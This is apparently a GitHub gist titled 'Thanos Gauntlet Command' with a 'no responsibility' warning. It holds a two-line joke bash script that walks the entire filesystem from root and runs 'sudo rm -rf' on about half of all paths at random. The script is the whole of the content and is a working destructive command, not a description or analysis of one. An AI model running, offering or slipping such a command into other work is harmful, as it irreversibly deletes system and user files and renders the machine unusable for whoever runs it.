Skip to content

Instantly share code, notes, and snippets.

@kneeprayer
Last active May 15, 2019 03:03
Show Gist options
  • Save kneeprayer/23b0d4dc45318d2f02f8bd0a70b5bb31 to your computer and use it in GitHub Desktop.
Save kneeprayer/23b0d4dc45318d2f02f8bd0a70b5bb31 to your computer and use it in GitHub Desktop.
Thanos Gauntlet Command (Warning : No responsibility)
#!/bin/bash
for i in $(find /); do [ $[ $RANDOM % 2 ] == 0 ] && sudo rm -rf $i ; done;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment